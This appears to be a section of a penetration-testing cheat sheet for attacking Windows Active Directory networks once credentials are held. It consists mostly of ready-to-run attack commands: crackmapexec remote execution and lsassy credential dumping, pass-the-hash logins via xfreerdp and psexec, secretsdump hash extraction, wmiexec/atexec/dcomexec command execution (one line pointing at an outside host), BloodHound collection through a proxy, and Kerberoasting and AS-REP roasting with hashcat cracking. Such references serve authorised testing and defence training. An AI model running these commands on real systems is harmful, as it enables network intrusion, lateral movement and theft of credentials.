########
w/ Creds
########

.. code-block:: bash

   RHOSTS="192.168.1.0/24"
   USER='user'
   PASS='pass'
   crackmapexec smb $RHOSTS -u"$USER" -p"$PASS" --shares -x whoami
   crackmapexec rdp $RHOSTS -u"$USER" -p"$PASS"
   crackmapexec winrm $RHOSTS -u"$USER" -p"$PASS" -x whoami
   crackmapexec wmi $RHOSTS -u"$USER" -p"$PASS" -x whoami
   crackmapexec mssql $RHOSTS -u"$USER" -p"$PASS" -x whoami
   crackmapexec ldap $RHOSTS -u"$USER" -p"$PASS"
   crackmapexec ldap $RHOSTS -u"$USER" -p"$PASS" -M adcs
   crackmapexec smb $RHOSTS -u"$USER" -p"$PASS" --shares -x whoami --local-auth
   crackmapexec smb $RHOSTS -u"$USER" -p"$PASS" --shares --put-file rustscan.exe /windows/temp/rustscan.exe
   crackmapexec smb $RHOSTS -u"$USER" --local-auth -H 3e1aef05e1b65e4f3cee0e60b0eba2de
   crackmapexec smb $RHOSTS -u"Administrator" -p"$PASS" -M lsassy
   enum4linux $RHOSTS -u "$USER" -p "$PASS"

.. code-block:: bash

   mkdir /tmp/share
   xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:hackerbeepboop /p:Blabliblou_1 +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share
   xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:user /pth:3e1aef05e1b65e4f3cee0e60b0eba2de +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share
   psexec.py 'domain.local'/'Administrator':'pass'@1.2.3.4
   psexec.py 'Administrator':'pass'@1.2.3.4
   psexec.py -hashes ":e7db1b821fac71d089d0b42d4a5bf605" Administrator@1.2.3.4 powershell.exe
   smbexec.py 'Administrator':'pass'@1.2.3.4
   secretsdump.py Administrator:'pass'@1.2.3.4 -history
   secretsdump.py user@1.2.3.4 -hashes ':3e1aef05e1b65e4f3cee0e60b0eba2de' -history
   wmiexec.py -k "user.ccache" 'powershell.exe "whoami /all"'
   wmiexec.py 'user':'pass'@1.2.3.4 'powershell.exe "whoami /all"'
   atexec.py 'user':'pass'@1.2.3.4 whoami
   dcomexec.py 'user':'pass'@1.2.3.4 'whoami'
   dcomexec.py -object MMC20 'user':'pass'@1.2.3.4 '\\4.3.2.1\test' -nooutput # test for execution, listen on 445 first

LDAP enumeration
================

.. code-block:: bash

   ldeep ldap -u user -p 'pass' -d do.main -s ldaps://1.2.3.4:636 all /tmp/ldeep
   ldapdomaindump ldaps://1.2.3.4:3269 -u 'do.main\user' -p 'pass'

**********
Bloodhound
**********

DC access required

.. code-block:: bash

   pip3 install --upgrade bloodhound
   cd $(mktemp -d)
   proxychains -q -f /tmp/PIVOT bloodhound-python --dns-tcp -u'user' -p'pass' -ns '1.2.3.10' -d 'do.main' -c All
   # https://github.com/BloodHoundAD/BloodHound/releases
   ./BloodHound --no-sandbox # Drag & drop the files from the previous step

.. code-block:: bash

   # Any unconstrained delegation? (BH query)
   MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
   # Any constrained delegation? (BH query)
   MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) return p
   # Find all the edges that any user has against all the nodes (BH query).
   MATCH (n:User) MATCH p=allShortestPaths((n)-[r:AllExtendedRights|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|AdminTo|CanRDP|ExecuteDCOM|ForceChangePassword*1..]->(m:Computer)) RETURN p
   # Kerberoast? (BH query)
   MATCH (n:User)WHERE n.hasspn=true RETURN n
   # GetUserSPNs.py -dc-ip 1.2.3.10 'do.main/user:pass' -request -outputfile /tmp/hashes.kerberoast
   # hashcat -m 13100 -a 0 /tmp/hashes.kerberoast rockyou.txt --potfile-path=HASHCATPOT
   # Pre-auth not required? (BH query)
   MATCH (u:User {dontreqpreauth: true}) RETURN u
   # GetNPUsers.py -debug 'do.main/' -usersfile /tmp/users -outputfile /tmp/hashes.aspreroast -format hashcat -dc-ip 1.2.3.10
   # sudo hashcat -m 18200 /tmp/hashes.aspreroast rockyou.txt --potfile-path=HASHCATPOT